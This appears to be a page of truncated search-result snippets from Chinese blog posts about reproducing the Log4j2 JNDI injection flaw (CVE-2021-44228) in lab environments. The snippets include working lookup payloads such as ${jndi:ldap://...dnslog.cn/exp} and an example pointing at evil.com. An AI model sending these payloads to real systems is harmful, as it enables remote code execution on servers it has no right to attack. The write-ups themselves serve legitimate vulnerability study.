第一条，心中无女人，挖洞自然神。 白帽守则第一页第二条，只有不努力的白帽，没有挖不到的漏洞 对此我深表 ...

二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看，也可以使用burp自带的dnslog进行查看，我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显，说明存在该漏洞 ...

今天突然想码字，那就写一下log4j。 一、漏洞简介 1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是：在打印日志的时候，如果你的日志内容中包含 ...

参考链接 https://www.cnblogs.com/xuzhujack/p/15673703.html https://blog.csdn.net/weixin_44309905/artic ...

本次记录自己测试时每一步操作，很详细。 本次复现分为curl测试和拿shell两种操作，测试完curl后体验时长到期了，只能换环境了。 本次测试环境如下： curl------------------------------------------------------ 靶场 ...

2021-log4j2漏洞复现CVE-2021-44228 2021年12月15日 12:03 该漏洞是最近新爆出的漏洞能够远程执行 命令： 该镜像本地可以搭建环境： 1、拉取一个docker镜像 docker pull vulfocus ...

漏洞简介 Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意 ...

前言 Log4j2是Java开发常用的日志框架，这次的漏洞是核弹级的，影响范围广，危害大，攻击手段简单，已知可能影响到的相关应用有 Apache Solr Apache Flink Apache Druid Apache Struts2 ...